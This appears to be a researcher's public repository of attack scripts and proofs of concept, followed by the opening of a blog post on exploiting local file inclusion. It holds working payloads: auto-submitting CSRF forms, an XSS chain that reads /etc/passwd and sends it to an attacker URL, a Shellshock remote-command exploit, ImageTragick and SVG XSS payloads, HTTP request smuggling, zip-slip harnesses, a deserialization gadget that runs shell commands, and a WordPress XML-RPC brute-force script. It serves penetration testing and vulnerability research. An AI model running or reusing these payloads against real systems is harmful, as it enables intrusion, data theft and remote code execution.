--------------------------------------------------------------------------------
 1 | CSRF through XMLHTTPrequest.
 2 | 
 3 | 
 4 | <script>
 5 | var http = new XMLHttpRequest();
 6 | var postdata= "_submit_button=parameter+here"; 
 7 | 
 8 | http.open("POST", "https://addurl.com", true);
 9 | 
10 | //Send the proper header information along with the request
11 | http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
12 | http.setRequestHeader("Content-length", postdata.length);
13 | 
14 | 
15 | http.onreadystatechange = function() {//Call a function when the state changes.
16 |    if(http.readyState == 4 && http.status == 200) {
17 |       alert(http.responseText);
18 |    }
19 | }
20 | http.send(postdata);
21 | </script>
22 | 
23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/Scripts and pocs/csrf_form.html:
--------------------------------------------------------------------------------
 1 | <head>
 2 | </head>
 3 | <body>
 4 | 
 5 | <form id="dynForm" enctype="multipart/form-data" action="https:/<target>" method="post">
 6 |     <INPUT type="hidden" name="user.avatar" value="avatar.png">
 7 |     <INPUT type="hidden" name="UserId" value="">
 8 |     <INPUT type="hidden" name="password1" value="">
 9 |     <INPUT type="hidden" name="password2" value="">
10 |     <INPUT type="hidden" name="checkbox" value="true">
11 |     <INPUT type="submit" value="Send">
12 |  </form>
13 | <script>
14 |      document.getElementById("dynForm").submit();
15 | </script>
16 | </body>
17 | 


--------------------------------------------------------------------------------
/Scripts and pocs/d2p.py:
--------------------------------------------------------------------------------
 1 | from sys import argv, exit
 2 | from random import randint, shuffle
 3 | from socket import gethostbyname_ex
 4 | from collections import defaultdict
 5 | 
 6 | def usage():
 7 | 	print "Usage: %s <file>" % argv[0]
 8 | 	exit(0)
 9 | 
10 | if len(argv) < 2:
11 | 	usage()
12 | 
13 | mapped_domains = defaultdict(list)
14 | 
15 | try:
16 | 	for domain in open(argv[1]):
17 | 		domain = domain.strip()
18 | 		try:
19 | 			ip_addresses = gethostbyname_ex(domain)[2:] # skip domain + []
20 | 			ip_addresses = list(ip_addresses)[0]
21 | 			for ip_address in list(ip_addresses):
22 | 				mapped_domains[ip_address].append(domain)
23 | 		except:
24 | 			print "[-] Error while performing whois for: %s" % domain
25 | 
26 | except:
27 | 	print "[-] Error while parsing the domain file."
28 | 	exit(1)
29 | 
30 | fp = open("output.txt", "w")
31 | 
32 | while len(mapped_domains) > 1:
33 | 	ip_addresses = list(mapped_domains.keys())
34 | 	shuffle(ip_addresses)
35 | 
36 | 
37 | 	for ip_address in ip_addresses:
38 | 
39 | 		if ip_address in mapped_domains:
40 | 
41 | 			shuffle(mapped_domains[ip_address])
42 | 
43 | 			choice = randint(0, len(mapped_domains[ip_address]) - 1)
44 | 			domain = mapped_domains[ip_address][choice]
45 | 			fp.write("%s,\n" % domain)
46 | 
47 | 
48 | 			del mapped_domains[ip_address][choice]
49 | 
50 | 
51 | 			if len(mapped_domains[ip_address]) < 1:
52 | 				del mapped_domains[ip_address]
53 | 
54 | 
55 | 			for k, v in mapped_domains.iteritems():
56 | 				if domain in v: 
57 | 					del v[v.index(domain)]
58 | 					if len(mapped_domains[k]) < 1:
59 | 						del mapped_domains[k]
60 | 					break
61 | fp.close()
62 | 


--------------------------------------------------------------------------------
/Scripts and pocs/darious_zipper.php:
--------------------------------------------------------------------------------
1 | <?php
2 | require __DIR__ . '/vendor/autoload.php';
3 | $zipper = new \DariusIII\Zipper\Zipper;
4 | 
5 | $zipper->make('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip')->extractTo('/home/snoopy/zipslip/uploads');
6 | $zipper->close();


--------------------------------------------------------------------------------
/Scripts and pocs/datauri.txt:
--------------------------------------------------------------------------------
1 | data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cG9seWdvbiBpZD0idHJpYW5nbGUiIHBvaW50cz0iMCwwIDAsNTAgNTAsMCIgZmlsbD0iIzAwOTkwMCIgc3Ryb2tlPSIjMDA0NDAwIi8+CiAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KICAgICAgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pOwogICA8L3NjcmlwdD4KPC9zdmc+Cg==
2 | 


--------------------------------------------------------------------------------
/Scripts and pocs/extractor_poc.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require __DIR__ . '/vendor/autoload.php';
 3 | use Symfony\Component\Finder\Finder;
 4 | use Mmoreram\Extractor\Filesystem\TemporaryDirectory;
 5 | use Mmoreram\Extractor\Resolver\ExtensionResolver;
 6 | use Mmoreram\Extractor\Extractor;
 7 | 
 8 | $temporaryDirectory = new TemporaryDirectory();
 9 | $extensionResolver = new ExtensionResolver;
10 | $extractor = new Extractor(
11 |     $temporaryDirectory,
12 |     $extensionResolver
13 | );
14 | 
15 | 
16 | 
17 | /**
18 |  * @var Finder $files
19 |  */
20 | $files = $extractor->extractFromFile('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
21 | foreach ($files as $file) {
22 |     echo $file->getRealpath() . PHP_EOL;
23 |     echo $file;
24 | }


--------------------------------------------------------------------------------
/Scripts and pocs/ghostwriter_localfileaccess_poc.html:
--------------------------------------------------------------------------------
1 | <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
2 | <script>
3 |     $.getScript( "../../../../../../../../etc/passwd", function( file, textStatus, jqxhr ) {
4 |         document.write('<img src="http:/attackerurl?data=' + btoa(file) + '">');
5 |     });
6 | </script>
7 | 


--------------------------------------------------------------------------------
/Scripts and pocs/ghostwriterxsstolocalfileaccess.html:
--------------------------------------------------------------------------------
1 | <!-- related to https://github.com/wereturtle/ghostwriter/issues/437 -->
2 | 
3 | <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
4 | <script>
5 |     $.getScript( "../../../../../../../../etc/passwd", function( file, textStatus, jqxhr ) {
6 |         document.write('<img src="http:/attackerurl?data=' + btoa(file) + '">');
7 |     });
8 | </script>
9 | 


--------------------------------------------------------------------------------
/Scripts and pocs/imgtragick.jpg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(http://0.0.0.0:8055)'
4 | pop graphic-context
5 | 


--------------------------------------------------------------------------------
/Scripts and pocs/installvulnserver.ps1:
--------------------------------------------------------------------------------
 1 | # install vulnserver
 2 | $down = New-Object System.Net.WebClient
 3 | $url  = 'https://github.com/stephenbradshaw/vulnserver/raw/master/vulnserver.exe';
 4 | $url2  = 'https://github.com/stephenbradshaw/vulnserver/raw/master/essfunc.dll';
 5 | $file = 'vulnserver.exe';
 6 | $file2 = 'essfunc.dll';
 7 | $down.DownloadFile($url,$file);
 8 | $down.DownloadFile($url2,$file2);
 9 | $exec = New-Object -com shell.application
10 | $exec.shellexecute($file);
11 | 


--------------------------------------------------------------------------------
/Scripts and pocs/iplist.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | IPLIST="/home/../iplist.txt"
4 | 
5 | while read IP; do
6 |     dig -x "$IP" +short | head -1
7 | done < "$IPLIST" >results.csv
8 | 


--------------------------------------------------------------------------------
/Scripts and pocs/laravel_zip.php:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | <?php
4 | require __DIR__ . '/vendor/autoload.php';
5 | use ZanySoft\Zip\Zip;
6 | 
7 | 
8 | $zip = Zip::open('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
9 | $zip->extract('/home/snoopy/zipslip/uploads');


--------------------------------------------------------------------------------
/Scripts and pocs/madzipper.php:
--------------------------------------------------------------------------------
1 | <?php
2 | require 'vendor/autoload.php';
3 | 
4 | $zipper = new \Madnest\Madzipper\Madzipper;
5 | 
6 | $zipper->make('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip')->extractTo('/home/snoopy/zipslip/uploads');
7 | $zipper->close();


--------------------------------------------------------------------------------
/Scripts and pocs/main.rs:
--------------------------------------------------------------------------------
 1 | extern crate tar;
 2 | 
 3 | use std::io::prelude::*;
 4 | use std::fs::File;
 5 | use tar::Archive;
 6 | 
 7 | fn main() {
 8 |     let file = File::open("/home/snoopy/evilarc/evil.tar").unwrap();
 9 |     let mut a = Archive::new(file);
10 | 
11 |     for file in a.entries().unwrap() {
12 |         // Make sure there wasn't an I/O error
13 |         let mut file = file.unwrap();
14 | 
15 |         // Inspect metadata about the file
16 |         println!("{:?}", file.header().path().unwrap());
17 |         println!("{}", file.header().size().unwrap());
18 | 
19 |         // files implement the Read trait
20 |         let mut s = String::new();
21 |         file.read_to_string(&mut s).unwrap();
22 |         println!("{}", s);
23 |     }
24 | }
25 | 


--------------------------------------------------------------------------------
/Scripts and pocs/main.swift:
--------------------------------------------------------------------------------
 1 | //
 2 | //  main.swift
 3 | //  deserialization_nscoding
 4 | //
 5 | //  Created by sams on 07/03/2023.
 6 | //
 7 | 
 8 | import Foundation
 9 | 
10 | class Employee: NSObject, NSSecureCoding {
11 |     
12 |     public static var supportsSecureCoding = true
13 |     var name: String
14 |     var role: String
15 |     
16 |     init(name: String, role: String) {
17 |         self.name = name
18 |         self.role = role
19 |     }
20 |     
21 |     required convenience init?(coder aDecoder: NSCoder) {
22 |         guard let name = aDecoder.decodeObject(forKey: "name") as? String,
23 |               let role = aDecoder.decodeObject(forKey: "role") as? String else {
24 |             return nil
25 |         }
26 |         
27 |         self.init(name: name, role: role)
28 |     }
29 |     
30 |     func encode(with aCoder: NSCoder) {
31 |         aCoder.encode(name, forKey: "name")
32 |         aCoder.encode(role, forKey: "role")
33 |     }
34 | }
35 | 
36 | // Archive the Person object to a file
37 | //let person = Employee(name: "John", role: "consultant")
38 | //let fileURL = URL(fileURLWithPath: "/tmp/file")
39 | //NSKeyedArchiver.archiveRootObject(person, toFile: fileURL.path)
40 | 
41 | if let unarchivedPerson = NSKeyedUnarchiver.unarchiveObject(withFile: "/tmp/file2") as? Employee {
42 |     print("Name: \(unarchivedPerson.name), Role: \(unarchivedPerson.role)")
43 | } else {
44 |     print("Failed to unarchive Employee object")
45 | }
46 | 
47 | 
48 | 
49 | //let gadget = ExampleGadget(command: "ls")
50 | //let fileURL2 = URL(fileURLWithPath: "/tmp/file2")
51 | //NSKeyedArchiver.archiveRootObject(gadget, toFile: fileURL2.path)
52 | 
53 | 
54 | // Unarchive the Person object from the file
55 | /*
56 | if let unarchivedPerson = NSKeyedUnarchiver.unarchiveObject(withFile: "/tmp/file2") as? Employee {
57 |     print("Name: \(unarchivedPerson.name), Role: \(unarchivedPerson.role)")
58 | } else {
59 |     print("Failed to unarchive Employee object")
60 | }
61 | */
62 | 
63 | let fileURLDecoded = URL(fileURLWithPath: "/tmp/file2")
64 | do {
65 |     let dataDecoded = try Data(contentsOf: fileURLDecoded)
66 |     let unarchiver = try NSKeyedUnarchiver(forReadingFrom: dataDecoded) // This initializer enables requiresSecureCoding by default
67 |     unarchiver.requiresSecureCoding = true
68 |     let decodedDataObject = try unarchiver.decodeTopLevelObject()
69 |     unarchiver.finishDecoding()
70 |     
71 |     let pokeMirror = Mirror(reflecting: decodedDataObject)
72 |     let properties = pokeMirror.children
73 |     for property in properties {
74 |         
75 |         print("\(property.label!) = \(property.value)")
76 |         
77 |     }
78 | }
79 |     
80 | 


--------------------------------------------------------------------------------
/Scripts and pocs/method-enumerator.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/bash
 2 | filename="$1"
 3 | while read -r line
 4 | do
 5 |     name="$line"
 6 |     echo
 7 |     echo "Sending PUT request to $name"
 8 | 	echo
 9 |     curl -IXOPTIONS "$name"
10 | 
11 | 
12 | done < "$filename"
13 | 
14 | 
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/Scripts and pocs/old_pcl_zip.php:
--------------------------------------------------------------------------------
1 | <?php
2 | require __DIR__ . '/vendor/autoload.php';
3 | #use Chamilo\PclZip;
4 | 
5 | $zip = new PclZip('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
6 | $zip->extract(PCLZIP_OPT_PATH, '/home/snoopy/zipslip/uploads');


--------------------------------------------------------------------------------
/Scripts and pocs/pcl_zip.php:
--------------------------------------------------------------------------------
1 | <?php
2 | require __DIR__ . '/vendor/autoload.php';
3 | #use Chamilo\PclZip;
4 | 
5 | $zip = new PclZip('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
6 | $zip->extract(PCLZIP_OPT_PATH, '/home/snoopy/zipslip/uploads');


--------------------------------------------------------------------------------
/Scripts and pocs/php_archive.php:
--------------------------------------------------------------------------------
1 | <?php
2 | require __DIR__ . '/vendor/autoload.php';
3 | use splitbrain\PHPArchive\Zip;
4 | 
5 | $tar = new Zip();
6 | $tar->open('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
7 | $tar->extract('/home/snoopy/zipslip/uploads');


--------------------------------------------------------------------------------
/Scripts and pocs/php_zip.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require __DIR__ . '/vendor/autoload.php';
 3 | 
 4 | 
 5 | $zipFile = new \PhpZip\ZipFile();
 6 | 
 7 | 
 8 | $zipFile->openFile('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
 9 | $zipFile->extractTo('/home/snoopy/zipslip/uploads');
10 | $zipFile->close();


--------------------------------------------------------------------------------
/Scripts and pocs/preview.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/Scripts and pocs/preview.gif


--------------------------------------------------------------------------------
/Scripts and pocs/pyserver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #pyserver
 3 | 
 4 | import SimpleHTTPServer
 5 | import SocketServer
 6 | 
 7 | PORT = 8000
 8 | 
 9 | Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
10 | 
11 | httpd = SocketServer.TCPServer(("", PORT), Handler)
12 | 
13 | print "serving at port", PORT
14 | httpd.serve_forever()
15 | 


--------------------------------------------------------------------------------
/Scripts and pocs/s3bucket_poc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | aws s3api put-object-acl --bucket $1 --key $2 --grant-full-control emailaddress=$3 --grant-write uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers
3 | aws s3api get-object-acl --bucket $1 --key $2


--------------------------------------------------------------------------------
/Scripts and pocs/server.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"net/http"
 5 | )
 6 | 
 7 | func helloWorld(w http.ResponseWriter, r *http.Request) {
 8 | 	if r.URL.Path != "/" {
 9 | 		http.NotFound(w, r)
10 | 		return
11 | 	}
12 | 	w.Header().Set("Content-Type", "application/json; charset=utf-8a\\r\\nSet-cookie: injected=value")
13 | 	w.Write([]byte(`{"hello": "world"}`))
14 | }
15 | 
16 | func main() {
17 | 	http.HandleFunc("/", helloWorld)
18 | 	http.ListenAndServe(":8000", nil)
19 | }
20 | 


--------------------------------------------------------------------------------
/Scripts and pocs/setup-SPartan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | echo 'This script installs SPartan, a Frontpage and Sharepoint fingerprinting and attack tool created by Sensepost'
 4 | 
 5 | echo 'Installing Python2.6'
 6 | echo '------------------------------------'
 7 | add-apt-repository ppa:fkrull/deadsnakes
 8 | apt-get update -y
 9 | apt-get install python2.6 python2.6-dev -y
10 | 
11 | echo 'Installing Pip2.6'
12 | echo '------------------------------------'
13 | wget https://bootstrap.pypa.io/get-pip.py --no-check-certificate
14 | chmod +x get-pip.py
15 | python2.6 get-pip.py
16 | 
17 | echo 'Checking if Git is installed'
18 | echo '------------------------------------'
19 | PKG_OK=$(dpkg-query -W --showformat='${Status}\n' git|grep "install ok installed")
20 | echo Checking for somelib: $PKG_OK
21 | if [ "" == "$PKG_OK" ]; then
22 |   echo "No somelib. Setting up somelib."
23 |   sudo apt-get --force-yes --yes git
24 | fi
25 | 
26 | 
27 | echo 'Downloading SPartan'
28 | echo '------------------------------------'
29 | git clone https://github.com/sensepost/SPartan.git;
30 | cd SPartan
31 | pip2.6 install -r requirements.txt
32 | python2.6 SPartan.py -v
33 | echo 'Done! :)'
34 | 


--------------------------------------------------------------------------------
/Scripts and pocs/shellshockpoc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | import urllib2
 5 | import httplib
 6 | 
 7 | 
 8 | def exploit(url, cmd):
 9 |     payload = "() { test;};echo \"Content-type: text/plain\"; echo; echo; '%s'" % cmd
10 |     print '[*] Final payload: ' + payload
11 |     try:
12 |         headers = {'User-Agent': payload}
13 |         request = urllib2.Request(url, headers=headers)
14 |         page = urllib2.urlopen(request).read()
15 |     except httplib.IncompleteRead, e:
16 |         page = e.partial
17 | 
18 |     print(page)
19 |     return page
20 | 
21 | 
22 | if __name__ == '__main__':
23 |     import sys
24 |     if len(sys.argv) != 3:
25 |         print("[*] shellshockpoc.py <url> <cmd>")
26 |         print("[*] Usage example: http://vulnerablehost.com/cgi-bin/status /usr/bin/id")
27 |     else:
28 |         print('[*] GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271)')
29 |         url = sys.argv[1]
30 |         cmd = sys.argv[2]
31 |         print("[*] cmd provided: %s\n" % cmd)
32 |         exploit(url, cmd)
33 | 


--------------------------------------------------------------------------------
/Scripts and pocs/smuggle.py:
--------------------------------------------------------------------------------
 1 | def queueRequests(target, wordlists):
 2 |     engine = RequestEngine(endpoint='http://127.0.0.1:1080',
 3 |                            concurrentConnections=1,
 4 |                            requestsPerConnection=1,
 5 |                            pipeline=False,
 6 |                            maxRetriesPerRequest=0
 7 |                            )
 8 | 
 9 |     attack = '''POST /login HTTP/1.1
10 | Host: 127.0.0.1:1080
11 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
12 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
13 | Accept-Language: en-US,en;q=0.5
14 | Accept-Encoding: gzip, deflate
15 | Content-Type: application/x-www-form-urlencoded
16 | Content-Length: 62
17 | Origin: http://127.0.0.1:1080
18 | Connection: close
19 | Referer: http://127.0.0.1:1080/
20 | Upgrade-Insecure-Requests: 1
21 | Transfer-Encoding: chunk
22 | 
23 | 16
24 | login=xxx&password=xxx
25 | 0
26 | 
27 | GET /404 HTTP/1.1
28 | X-Foo: bar'''
29 |     engine.queue(attack)
30 |     engine.start()
31 | 
32 | def handleResponse(req, interesting):
33 |     table.add(req)
34 |     if req.code == 200:
35 |         victim = '''GET / HTTP/1.1
36 | Host: 127.0.0.1:1080
37 | Connection: close
38 | 
39 | '''
40 | 
41 |         for i in range(10):
42 |             req.engine.queue(victim)
43 | 


--------------------------------------------------------------------------------
/Scripts and pocs/swffuzz.txt:
--------------------------------------------------------------------------------
 1 | #javascript:alert(1)",
 2 | #alert(1)",
 3 | #getURL(javascript:alert(1))",
 4 | #asfunction:getURL,javascript:alert(1)//",
 5 | #getURL,javascript:alert(1)",
 6 | #goto,javascript:alert(1)",	
 7 | ?javascript:alert(1)",
 8 | ?alert(1)",
 9 | ?getURL(javascript:alert(1))",
10 | ?asfunction:getURL,javascript:alert(1)//",
11 | ?getURL,javascript:alert(1)",
12 | ?goto,javascript:alert(1)",		
13 | ?clickTAG=javascript:alert(1)",
14 | ?url=javascript:alert(1)",
15 | ?clickTAG=javascript:alert(1)&TargetAS=",
16 | ?TargetAS=javascript:alert(1)",
17 | ?skinName=asfunction:getURL,javascript:alert(1)//",
18 | ?baseurl=asfunction:getURL,javascript:alert(1)//",
19 | ?base=javascript:alert(0)",                
20 | ?onend=javascript:alert(1)//",
21 | ?userDefined=');function someFunction(a){}alert(1)//",        
22 | ?URI=javascript:alert(1)",
23 | ?callback=javascript:alert(1)",
24 | ?getURLValue=javascript:alert(1)",
25 | ?goto=javascript:alert(1)",
26 | ?pg=javascript:alert(1)",
27 | ?page=javascript:alert(1)"


--------------------------------------------------------------------------------
/Scripts and pocs/test.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <body>
 4 | 
 5 | <h1>My First Heading</h1>
 6 | 
 7 | <script>alert(document.domain)</script>
 8 | 
 9 | </body>
10 | </html>
11 | 


--------------------------------------------------------------------------------
/Scripts and pocs/test.swift:
--------------------------------------------------------------------------------
 1 | //
 2 | //  Test.swift
 3 | //  deserialization_nscoding
 4 | //
 5 | //  Created by sams on 07/03/2023.
 6 | //
 7 | 
 8 | import Foundation
 9 | 
10 | class ExampleGadget: NSObject, NSSecureCoding {
11 |     
12 |     public static var supportsSecureCoding = true
13 |     
14 |     let command: String
15 | 
16 |     internal init(command: String) {
17 |         self.command = command
18 |     }
19 |     
20 |     
21 |     func encode(with coder: NSCoder) {
22 |         coder.encode(command, forKey: "command")
23 |     }
24 |     
25 |     required init?(coder: NSCoder) {
26 |         command = coder.decodeObject(forKey: "command") as! String
27 | 
28 |         super.init()
29 |         var result = sink1(tainted: command)
30 |         print(result)
31 |     }
32 |     
33 |     
34 |     func sink1(tainted: String) -> String {
35 | 
36 |             let process = Process()
37 |             process.executableURL = URL(fileURLWithPath: "/bin/bash")
38 |             process.arguments = ["-c", tainted]
39 |             let pipe = Pipe()
40 |             process.standardOutput = pipe
41 |             process.launch()
42 |             process.waitUntilExit()
43 |             let data = pipe.fileHandleForReading.readDataToEndOfFile()
44 |             guard let output: String = String(data: data, encoding: .utf8) else { return "" }
45 |         return output
46 | 
47 | }
48 | }
49 |     
50 |     
51 |     
52 | 


--------------------------------------------------------------------------------
/Scripts and pocs/token.py:
--------------------------------------------------------------------------------
1 | token = '857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.'
2 | count = 0
3 | result = []
4 | for value in token:
5 |   result.append(chr((ord(value) - count)))
6 |   count +=1
7 | 
8 | print ("".join(result))


--------------------------------------------------------------------------------
/Scripts and pocs/vpnsoft_unzip.php:
--------------------------------------------------------------------------------
1 | 
2 | <?php
3 | require __DIR__ . '/vendor/autoload.php';
4 | use VIPSoft\Unzip\Unzip;
5 | 
6 | 
7 | $unzipper  = new Unzip();
8 | $filenames = $unzipper->extract('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip', '/home/snoopy/zipslip/uploads');


--------------------------------------------------------------------------------
/Scripts and pocs/windowsappproxy.bat:
--------------------------------------------------------------------------------
1 | #Set HTTP proxy to burp in command prompt
2 | set HTTP_PROXY=http://127.0.0.1:8080
3 | #set HTTPS proxy to burp in command prompt
4 | set HTTPS_PROXY=http://127.0.0.1:8080


--------------------------------------------------------------------------------
/Scripts and pocs/wordlist_sorter.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Wordlist sorter to parse words from multiple files and sort it to remove duplicates
 4 | 
 5 | 
 6 | echo "Please enter a file path, Dont forget to add * at end to select everyfile"
 7 | echo "Example files path: /home/exampleuser/wordlistfolder/*"
 8 | read FILES
 9 | you entered: $FILES
10 | 
11 | 
12 | echo "Reading files from $FILES directory"
13 | wc -w $FILES
14 | 
15 | while true; do
16 |     read -p "Do you wish to sort these files" yn
17 |     case $yn in
18 |         [yes]* ) sort $FILES | uniq > newwordlist.txt; break;;
19 |         [no]* ) exit;;
20 |         * ) echo "Please answer yes or no.";;
21 |     esac
22 | done
23 | 


--------------------------------------------------------------------------------
/Scripts and pocs/xmlrpcbruteforce.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | # to use, type sh xmlrpcbruteforce.sh and give a URL when prompted
 3 | 
 4 | 
 5 | break='================================================================'
 6 | 
 7 | echo $break
 8 | echo
 9 | echo
10 | echo Give the target sites URL
11 | read urlname
12 | echo
13 | echo Sending a request to the given URL 
14 | echo
15 | echo Using the username foo and password password
16 | echo
17 | counter=1
18 | while [ $counter -le 5 ]
19 | do
20 | request=$(curl -d '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>foo</string></value></param><param><value><string>summer</string></value></param></params></methodCall>' $urlname/xmlrpc.php)
21 | ((counter++))
22 | done
23 | echo
24 | echo
25 | echo 'Printing Response...'
26 | echo $request
27 | echo
28 | echo
29 | echo
30 | newvar=$( echo $request | cut -c203-233 | wc -w  )
31 | 
32 | checkvar=4
33 | 
34 | 
35 | 
36 | if [ $newvar=$checkvar ];
37 |         then
38 |                 echo "Site is vulnerable to XML-RPC brute force"
39 |         else
40 | 				echo "Site not vulnerable to brute force"
41 |         fi
42 | echo
43 | echo
44 | echo
45 | 


--------------------------------------------------------------------------------
/Scripts and pocs/zeta_archive.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require __DIR__ . '/vendor/autoload.php';
 3 | 
 4 | #require_once 'tutorial_autoload.php';
 5 | #use zetacomponents\archive\ezcArchive;
 6 | #require __DIR__ . '/vendor/zetacomponents/archive/src/zip/zip.php';
 7 | #require __DIR__ . '/vendor/zetacomponents/archive/src/archive.php';
 8 | 
 9 | date_default_timezone_set( "UTC" );
10 | // Open the gzipped TAR archive.
11 | 
12 | 
13 | $archive = ezcArchive::open( "/home/snoopy/zipslip/payloads/test3.zip");
14 | $archive->extractCurrent( "/home/snoopy/zipslip/uploads" );
15 | 
16 | ?>


--------------------------------------------------------------------------------
/Scripts and pocs/ziparchiveex.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | require __DIR__ . '/vendor/autoload.php';
 3 | require __DIR__ .'/vendor/codeless/ziparchiveex/src/ZipArchiveEx.php';
 4 | #use codeless\ziparchiveex\ZipArchiveEx;
 5 | # ZipArchive as usual:
 6 | $zip = new ZipArchiveEx();
 7 | $zip->open('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/testzip-slip.zip', ZIPARCHIVE::OVERWRITE);
 8 | $zip->addDir('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/uploads');
 9 | echo $zip;
10 | # Add whole directory including contents:
11 | 
12 | 
13 | # Only add the contents of the directory, but
14 | # not the directory-entry of "mydir" itself:
15 | 
16 | # Close archive (as usual):
17 | $zip->close();


--------------------------------------------------------------------------------
/Scripts and pocs/zipstream.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Autoload the dependencies
 4 | require 'vendor/autoload.php';
 5 | # enable output of HTTP headers
 6 | use ZipStream\File;
 7 | use ZipStream\Option\Archive as ArchiveOptions;
 8 | use ZipStream\Option\File as FileOptions;
 9 | use ZipStream\Option\Method;
10 | use ZipStream\ZipStream;
11 | 
12 | $zipArch = new \ZipArchive;;
13 | $res = $zipArch->open('/home/snoopy/zipslip/payloads/zip-slip-vulnerability/archives/zip-slip.zip');
14 | $zipArch->extractTo('/home/snoopy/zipslip/uploads');
15 | $zipArch->close();


--------------------------------------------------------------------------------
/blog archive/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/blog archive/1.png


--------------------------------------------------------------------------------
/blog archive/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/snoopysecurity/Public/c8ed3bfe618f896cc6366419e1be0dcd73c51f9b/blog archive/2.png


--------------------------------------------------------------------------------
/blog archive/2015-04-12-Exploiting_Local_File_Inclusion_using_PHP_Wrappers.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout:     post
 3 | title:      "Exploiting Local File Inclusion using PHP Wrappers"
 4 | subtitle:   "LFI to Shell"
 5 | date:       2015-04-12 12:00:00
 6 | author:     "Snoopy, the Security Dog"
 7 | header-img: "img/post-bg-03.jpg"
 8 | ---
 9 | <h3>Introduction</h3>
10 | 
11 | <p>Local File Inclusion is a common technique used to include contents of a local file on a webpage. In many cases, a vulnerability can occur when a webpage uses user controlled input as part of its file include function that is not properly sanitised. This vulnerability can be exploited by an attacker to gather useful usernames, sensitive system information as well triggering remote code execution.</p>
12 | 
13 | 
14 | <p> Most common techniques of exploiting this vulnerability are
15 | <ul>
16 |   <li>Apache or SSH Log Poisoning</li>
17 |   <li>Environ Log poisoning</li>
18 |  </ul>
19 | </p>
20 | <p>This post will introduce the use of PHP wrappers to exploit a local file inclusion vulnerability. Using PHP wrappers, it is possible to execute commands on a server and get a remote shell.</p>
21 | 
22 | <h3>Technical Details</h3>
23 | 
24 | <p>To understand this vulnerability, take a look at the following example. The below PHP code takes a parameter called ‘page’ with the URL and any value given in the page parameter is included in the web page.</p>
25 | 
26 | <img alt="" src="http://snoopysecurity.github.io/img/lfi/lfi1.png" />
27 | 
28 | <p>The Uniform Resource Locater of the web application would look like the following</p>
29 | 
30 | 
31 | <blockquote>http://vulnapplication.com/fileinc/example2.php?page=intro</blockquote>
32 | 
33 | <p>An attacker can exploit this vulnerability by injecting directory traversal characters and look for local system files such as ‘passwd’ or ‘win.ini’. It should be noted that the example does check if the given input has a .php extension. This can be bypassed by an attacker using the null byte terminator. In many systems, Null bytes are processed as string termination; thus the file extension check can be bypassed by adding %00 at the end of a user input.</p>
34 | 
35 | <img alt="" src="http://snoopysecurity.github.io/img/lfi/lfi2.png" />
